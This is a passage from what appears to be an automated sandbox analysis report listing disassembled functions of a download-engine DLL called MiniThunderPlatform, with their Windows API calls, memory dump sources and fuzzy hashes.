                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1001B485
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$EnterH_prologLeave
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 367238759-0
                                                                                                                                              • Opcode ID: ad60b64603bca1546c1ee4dd79575e2d8b4b6d26e369e9f3d3d04de904862ba2
                                                                                                                                              • Instruction ID: a3611e171fccdf2fcbc740b9ad3028ee0eb0da04a4bc10bcd8fad581d18214b7
                                                                                                                                              • Opcode Fuzzy Hash: ad60b64603bca1546c1ee4dd79575e2d8b4b6d26e369e9f3d3d04de904862ba2
                                                                                                                                              • Instruction Fuzzy Hash: 8EF0B476610514DBDB14CB68C889BEEB3B9EF44304F004429F003EB251CB74B945CB50
                                                                                                                                              Function 10005417 Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • set_hub_proxy.DOWNLOAD_ENGINE(?), ref: 1000542F
                                                                                                                                                • Part of subcall function 10003DFB: memset.MSVCR71(10311348,?,00000314), ref: 10003E24
                                                                                                                                                • Part of subcall function 10003DFB: ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 10003E3C
                                                                                                                                                • Part of subcall function 10003DFB: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP71(?,10277CA8), ref: 10003E4D
                                                                                                                                                • Part of subcall function 10003DFB: ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 10003E5A
                                                                                                                                                • Part of subcall function 10003DFB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?,10277CA8), ref: 10003E69
                                                                                                                                                • Part of subcall function 10003DFB: ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 10003E7C
                                                                                                                                                • Part of subcall function 10003DFB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10003E83
                                                                                                                                                • Part of subcall function 10003DFB: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z.MSVCP71(?,10277CA8), ref: 10003E93
                                                                                                                                                • Part of subcall function 10003DFB: ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 10003E9A
                                                                                                                                                • Part of subcall function 10003DFB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?,10277CA8), ref: 10003EAF
                                                                                                                                                • Part of subcall function 10003DFB: ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 10003EC2
                                                                                                                                                • Part of subcall function 10003DFB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10003EC9
                                                                                                                                                • Part of subcall function 10003DFB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?,10277CA8), ref: 10003EE0
                                                                                                                                                • Part of subcall function 10003DFB: ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 10003EF3
                                                                                                                                                • Part of subcall function 10003DFB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10003EFA
                                                                                                                                                • Part of subcall function 10003DFB: ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 10003F07
                                                                                                                                              • GetTickCount.KERNEL32 ref: 10005434
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$D@std@@@std@@$??$?6D@std@@@0@V10@V?$basic_ostream@$??0?$basic_string@??1?$basic_string@$??6?$basic_ostream@V01@$??0?$basic_stringstream@?str@?$basic_stringstream@CountD@2@@2@TickV?$basic_string@memsetset_hub_proxy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1016402003-0
                                                                                                                                              • Opcode ID: 74202d94d7deb9fe58a754d2f226acbf2a6528b18476709b277c18b712f44c8f
                                                                                                                                              • Instruction ID: 3ac18d8da34187cf37bce65096854e03cd057e9a8f4e48f48fbb7a6e4379646b
                                                                                                                                              • Opcode Fuzzy Hash: 74202d94d7deb9fe58a754d2f226acbf2a6528b18476709b277c18b712f44c8f
                                                                                                                                              • Instruction Fuzzy Hash: 1CF0A976001024AFEB10DBA1CC4ECDB7F6CEFA6690B00C069F40A9B121DA71A981CAE0
                                                                                                                                              Function 10002657 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalDeleteH_prologSection
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3454226681-0
                                                                                                                                              • Opcode ID: 3a38c80fd99485330f223a17ebc5a3eef5798f092b3d6aaf921903fad8fdc228
                                                                                                                                              • Instruction ID: 9e30cef70f2aba8efdeb832b7c02e1f540eaf84bb0cbceb80ac29d8f929846b1
                                                                                                                                              • Opcode Fuzzy Hash: 3a38c80fd99485330f223a17ebc5a3eef5798f092b3d6aaf921903fad8fdc228
                                                                                                                                              • Instruction Fuzzy Hash: DDF05E75A00611DFD7248F54D8096AEB7A8EF59215F40845DE493A7700CBB5A901CB90
                                                                                                                                              Function 10054000 Relevance: 3.0, APIs: 2, Instructions: 27timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10053F10: socket.WS2_32(00000002,00000002,00000000), ref: 10053F27
                                                                                                                                                • Part of subcall function 10053F10: WSACreateEvent.WS2_32 ref: 10053F35
                                                                                                                                                • Part of subcall function 10053F10: WSAEventSelect.WS2_32(?,00000000,00000003), ref: 10053F49
                                                                                                                                              • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 10054018
                                                                                                                                              • SetWaitableTimer.KERNEL32 ref: 1005404B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateEventTimerWaitable$Selectsocket
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2683953990-0
                                                                                                                                              • Opcode ID: cd6e1146266e49b0e3a71014957d45df883dc68a503a4c7fae0868a39c9403f8
                                                                                                                                              • Instruction ID: 71c9d0ee84511c1f1f8ca5f485dfcb09c49e09595b5cb9bd3388f446662d8d98
                                                                                                                                              • Opcode Fuzzy Hash: cd6e1146266e49b0e3a71014957d45df883dc68a503a4c7fae0868a39c9403f8
                                                                                                                                              • Instruction Fuzzy Hash: 00F03771A443105FD7649F14DC4AB467AE4AB4CB01F00461DF989B62D1C6B0650C8FE5
                                                                                                                                              Function 10050810 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateIoCompletionPort.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,102444DC,000000FF,10031963,?,00000000), ref: 1005082B
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,102444DC,000000FF,10031963,?,00000000), ref: 10050835
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CompletionCreateErrorLastPort
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 826170474-0
                                                                                                                                              • Opcode ID: 7a5dfa64cb04de70790ab99c1a533a69cbbf87dc0401fc28cf5fe9e5a6ae8358
                                                                                                                                              • Instruction ID: 31129b671ad95338f5b22fdee08c34064636346353cd059916fa2445fdeb0074
                                                                                                                                              • Opcode Fuzzy Hash: 7a5dfa64cb04de70790ab99c1a533a69cbbf87dc0401fc28cf5fe9e5a6ae8358
                                                                                                                                              • Instruction Fuzzy Hash: 2CE01274340201AFD750CF74CC8CF5A77E8BF59B81B558594F508DB2A2DA21DC85DA51
                                                                                                                                              Function 1002A760 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 1002A560: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1002A5BF
                                                                                                                                                • Part of subcall function 10028D20: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 10028D64
                                                                                                                                                • Part of subcall function 10028D20: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBD@Z.MSVCP71(1027B984), ref: 10028E3E
                                                                                                                                                • Part of subcall function 10028D20: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 10028E70
                                                                                                                                                • Part of subcall function 10028D20: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10028E7D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002A7CC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@?append@?$basic_string@V12@$V01@@V12@@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1380449886-0
                                                                                                                                              • Opcode ID: ccd0ed57aa242f3ec54e0d6f33b71b9c7c8b100c0614087a07926994d0611a5a
                                                                                                                                              • Instruction ID: 084bbe4b7d70334bd4ad592ea4977227c08cb6529049bf35283b922d38bae1e6
                                                                                                                                              • Opcode Fuzzy Hash: ccd0ed57aa242f3ec54e0d6f33b71b9c7c8b100c0614087a07926994d0611a5a
                                                                                                                                              • Instruction Fuzzy Hash: C8017CB5508350AFC304DF18C945B4BBBE8FB8CB14F804A0DF49983281D7B4A508CB93
                                                                                                                                              Function 100A4110 Relevance: 1.5, APIs: 1, Instructions: 36networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • InternetGetCookieA.WININET(?,00000000,?,?), ref: 100A414B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CookieInternet
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 930238652-0
                                                                                                                                              • Opcode ID: 3332872ebc6989685a879b80cd567c20a9ad9b6b8e3b698f5fcfe78470da6989
                                                                                                                                              • Instruction ID: c19e9088c3896fc331465225c006c2b0d3f514eaa0af19daf41633eb6f91c5dd
                                                                                                                                              • Opcode Fuzzy Hash: 3332872ebc6989685a879b80cd567c20a9ad9b6b8e3b698f5fcfe78470da6989
                                                                                                                                              • Instruction Fuzzy Hash: 5BF037B6904249EFCB10DF99DC45FAFBBB8EB59620F10862AF925D3280D7345900CBA0
                                                                                                                                              Function 100122E9 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 10012336
                                                                                                                                                • Part of subcall function 10011185: memset.MSVCR71(?,00000000,00000104,00000000,102768F0,00000104), ref: 100111C2
                                                                                                                                                • Part of subcall function 10011185: wcslen.MSVCR71(?,?,00000104,00000000,00000000,00000000,102768F0,00000104), ref: 100111D2
                                                                                                                                                • Part of subcall function 10011185: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 100111DD
                                                                                                                                                • Part of subcall function 10011185: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100111F8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$ByteCharMultiWidememsetwcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3191298366-0
                                                                                                                                              • Opcode ID: e27b616b3bd425c7f72862ec81936f03288893bc6055ec8b6132ed79a5a78f29
                                                                                                                                              • Instruction ID: 7474786cf3b1969430639391c710df40a23838a01a3581bfe58c430376d5628f
                                                                                                                                              • Opcode Fuzzy Hash: e27b616b3bd425c7f72862ec81936f03288893bc6055ec8b6132ed79a5a78f29
                                                                                                                                              • Instruction Fuzzy Hash: 32F0E275605228AFDB04DB64DC4AADEB3B8EF04325F10419AE80197181DF74EB848A84
                                                                                                                                              Function 1001234B Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,00000014), ref: 10012398
                                                                                                                                                • Part of subcall function 10011185: memset.MSVCR71(?,00000000,00000104,00000000,102768F0,00000104), ref: 100111C2
                                                                                                                                                • Part of subcall function 10011185: wcslen.MSVCR71(?,?,00000104,00000000,00000000,00000000,102768F0,00000104), ref: 100111D2
                                                                                                                                                • Part of subcall function 10011185: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 100111DD
                                                                                                                                                • Part of subcall function 10011185: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100111F8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$ByteCharMultiWidememsetwcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3191298366-0
                                                                                                                                              • Opcode ID: 1992d9b0ac8bd7d5d62e443c8a9898cb7998c422a85bede8029ee302937c10ff
                                                                                                                                              • Instruction ID: aa85a0bb1699bda9411f8f55aecaf330731722c0f81dd95abd3e20686e945f1a
                                                                                                                                              • Opcode Fuzzy Hash: 1992d9b0ac8bd7d5d62e443c8a9898cb7998c422a85bede8029ee302937c10ff
                                                                                                                                              • Instruction Fuzzy Hash: 84F0E27560532CAFDB04DB60DD4AADE73B8EF05329F10419AE805A7180DFB4EBC48A84
                                                                                                                                              Function 100119D0 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 10011A1D
                                                                                                                                                • Part of subcall function 10011185: memset.MSVCR71(?,00000000,00000104,00000000,102768F0,00000104), ref: 100111C2
                                                                                                                                                • Part of subcall function 10011185: wcslen.MSVCR71(?,?,00000104,00000000,00000000,00000000,102768F0,00000104), ref: 100111D2
                                                                                                                                                • Part of subcall function 10011185: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 100111DD
                                                                                                                                                • Part of subcall function 10011185: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100111F8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$ByteCharMultiWidememsetwcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3191298366-0
                                                                                                                                              • Opcode ID: 098b0756d17d638c376c8e47d4690f552c006f905968c57666455caea3c8135c
                                                                                                                                              • Instruction ID: e3f46e3558bbfe3f8e28689da947e8af68a432489bc5fc2630052b92bec62a66
                                                                                                                                              • Opcode Fuzzy Hash: 098b0756d17d638c376c8e47d4690f552c006f905968c57666455caea3c8135c
                                                                                                                                              • Instruction Fuzzy Hash: B0F0E935605218AFDB04DB50DC4A6DE73B8EF05315F10429AE801A7180DF70EA848A85
                                                                                                                                              Function 10055D40 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10055A20: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(.sandai.net,?,?,774D23A0), ref: 10055A60
                                                                                                                                                • Part of subcall function 10055A20: ?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(?,FFFFFFFF,?), ref: 10055AA2
                                                                                                                                                • Part of subcall function 10055A20: ??0?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000002,00000001), ref: 10055ADB
                                                                                                                                                • Part of subcall function 10055A20: ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@D@Z.MSVCP71(00000000), ref: 10055B07
                                                                                                                                                • Part of subcall function 10055A20: ?str@?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71 ref: 10055B52
                                                                                                                                              • SetEvent.KERNEL32(?,00000000,10057343,?,?,?,?,?,0000002E,?,00000000,1005901A,?,1005BF55,?,92492493), ref: 10055D6F
                                                                                                                                                • Part of subcall function 10055950: GetPrivateProfileIntA.KERNEL32(adns_fail_cache,enable,00000000,-00000004), ref: 100559BF
                                                                                                                                                • Part of subcall function 10055950: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,00000000,10245167,000000FF,10055D61,?,00000000), ref: 100559CD
                                                                                                                                                • Part of subcall function 10055950: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100559DC
                                                                                                                                                • Part of subcall function 10055950: GetTickCount.KERNEL32 ref: 100559F4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$??1?$basic_string@$??$?6??0?$basic_ostringstream@??0?$basic_string@?rfind@?$basic_string@?str@?$basic_ostringstream@CountD@2@@2@D@std@@@0@D@std@@@std@@EventPrivateProfileTickV10@V?$basic_ostream@V?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1547212780-0
                                                                                                                                              • Opcode ID: a84071ac7cf90e55b2a2914d4433b6b845f128dab0b553e6b652a48a2f051b3e
                                                                                                                                              • Instruction ID: f32b1b83651c065deab81f9f103bf33e5c14704ac8fba6a98bed7dbf043c1c7b
                                                                                                                                              • Opcode Fuzzy Hash: a84071ac7cf90e55b2a2914d4433b6b845f128dab0b553e6b652a48a2f051b3e
                                                                                                                                              • Instruction Fuzzy Hash: F3F058752007108BC330CB29E498E96B3E4FF0C266B040A28E48AC7A11D761F845CBA1
                                                                                                                                              Function 1005C260 Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON
                                                                                                                                              Download Yara Rule
